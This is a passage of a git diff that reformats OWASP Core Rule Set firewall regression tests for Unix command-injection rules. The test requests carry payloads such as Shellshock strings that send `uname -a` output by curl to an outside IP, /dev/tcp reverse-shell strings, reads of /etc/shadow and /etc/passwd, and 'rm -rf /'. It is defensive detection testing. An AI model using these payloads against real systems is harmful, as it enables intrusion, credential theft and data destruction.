+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 20
 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-21
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 21
 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-22
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 22
 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the end
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
- version: HTTP/1.1
- output:
- log_contains: id "932230"
- - test_title: 932230-23
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [932230]
+ - test_id: 23
 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\""
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-24
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\""
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: 
[932230]
+ - test_id: 24
 desc: RCE in arg and html entity is sent in cookie
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something
- method: POST
- port: 80
- uri: "/post"
- data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\""
- version: HTTP/1.1
- output:
- log_contains: id "932230"
- - test_title: 932230-25
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\""
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [932230]
+ - test_id: 25
 desc: RCE in arg and html entity is sent in cookie
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something
- 
method: POST
- port: 80
- uri: "/post"
- data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\""
- version: HTTP/1.1
- output:
- log_contains: id "932230"
- - test_title: 932230-26
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\""
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [932230]
+ - test_id: 26
 desc: "Unix command injection"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=` /bin/cat /etc/passwd`"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-27
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=` /bin/cat /etc/passwd`"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 27
 desc: "Unix command injection"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- 
method: POST
- port: 80
- uri: "/post"
- data: "var=`cut crs312``dig 34test`"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-28
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=`cut crs312``dig 34test`"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 28
 desc: Test RCE with new semantic versions - ;gcc10.1
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=;gcc10.1<<$d/tcp/51.15.142.164/777"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: en-us,en;q=0.5
- method: GET
- port: 80
- uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777"
- version: HTTP/1.1
- output:
- log_contains: id "932230"
- - test_title: 932230-37
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [932230]
+ - test_id: 37
 desc: 
"55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 38 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . 
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 39
 desc: "9323HNQU"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- data: |
- code=;vi dddd +silent\\ \!whoami +wq
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-40
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: |
+ code=;vi dddd +silent\\ \!whoami +wq
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 40
 desc: "9323HNQU"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- data: |
- code=;vim dddd +silent\\ \!whoami +wq
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-41
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: |
+ code=;vim dddd +silent\\ \!whoami +wq
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 41
 desc: "9323HNQU"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- data: |
- code=;ex 
dddd +silent\\ \!whoami +wq
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-42
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: |
+ code=;ex dddd +silent\\ \!whoami +wq
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 42
 desc: "9323HNQU"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- data: |
- code=;vi -c:\!pwd
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-43
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: |
+ code=;vi -c:\!pwd
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 43
 desc: "9323HNQU"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- data: |
- code=;vim -c:\!pwd
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-44
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: |
+ code=;vim -c:\!pwd
+ version: HTTP/1.0
+ output:
+ log:
+ 
no_expect_ids: [932230]
+ - test_id: 44
 desc: "9323HNQU"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- data: |
- code=;ex -c:\!pwd
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-45
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: |
+ code=;ex -c:\!pwd
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 45
 desc: "ATFHUJVF"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- data: |
- code=;gdb -nx -ex \!whoami -ex quit
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-46
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: |
+ code=;gdb -nx -ex \!whoami -ex quit
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 46
 desc: "JW2SU88A"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- version: HTTP/1.0
- data: |
- code=;cat /path/file.gz
- output:
- no_log_contains: id "932230"
- - 
test_title: 932230-47
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ version: HTTP/1.0
+ data: |
+ code=;cat /path/file.gz
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 47
 desc: "FP with word environment"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- method: GET
- port: 80
- uri: "/get?args=;environment"
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-48
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ method: GET
+ port: 80
+ uri: "/get?args=;environment"
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 48
 desc: "FP with word performance"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- method: GET
- port: 80
- uri: "/get?args=;performance"
- version: HTTP/1.0
- output:
- no_log_contains: id "932230"
- - test_title: 932230-49
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ method: GET
+ port: 80
+ uri: "/get?args=;performance"
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 49
 desc: "Block execution of env command with arguments"
 stages:
- - stage:
- input:
- dest_addr: 
127.0.0.1
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- method: POST
- port: 80
- uri: "/post"
- data: "args=;env --version"
- version: HTTP/1.1
- output:
- log_contains: id "932230"
- - test_title: 932230-50
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "args=;env --version"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [932230]
+ - test_id: 50
 desc: "Block evasion using here string"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: POST
- port: 80
- uri: "/post"
- version: HTTP/1.0
- data: |
- code=;`cat<<, azurit"
 description: Tests for fix of 932231 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886
- enabled: true
- name: 932231.yaml
+ rule_id: 932231
 tests:
- - test_title: 932231-1
+ - test_id: 1
 desc: | True Negative Rule Integrity 1 arg value of "ifconfig;. rm -rf /; Something „The Title”. 
After space or new line more characters" is blocked
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters"
- version: HTTP/1.0
- output:
- log_contains: id "932231"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [932231]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
index 26f808924..068a16d9b 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
@@ -2,128 +2,127 @@ meta:
 author: "Franziska Bühler, azurit"
 description: "Remote Command Execution: Unix Command Injection"
- enabled: true
- name: 932232.yaml
+rule_id: 932232
 tests:
- - test_title: 932232-1
+ - test_id: 1
 desc: "/?arg=;ps"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: localhost
- Proxy-Connection: keep-alive
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?arg=%3Bps"
- version: HTTP/1.0
- output:
- log_contains: id "932232"
- - test_title: 932232-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Host: localhost
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: "/get?arg=%3Bps"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [932232]
+ - test_id: 2
 desc: "/?arg=|vi (x"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: localhost
- Proxy-Connection: keep-alive
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?arg=%7Cvi%20%28x"
- version: HTTP/1.0
- output:
- log_contains: id "932232"
- - test_title: 932232-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Host: localhost
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: "/get?arg=%7Cvi%20%28x"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [932232]
+ - test_id: 3
 desc: "/?arg=&w (x"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: localhost
- Proxy-Connection: keep-alive
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?arg=%26w%20%28x"
- version: HTTP/1.0
- output:
- log_contains: id "932232"
- - test_title: 932232-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Host: localhost
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: "/get?arg=%26w%20%28x"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [932232]
+ - test_id: 4
 desc: "/?arg=&aptitude"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
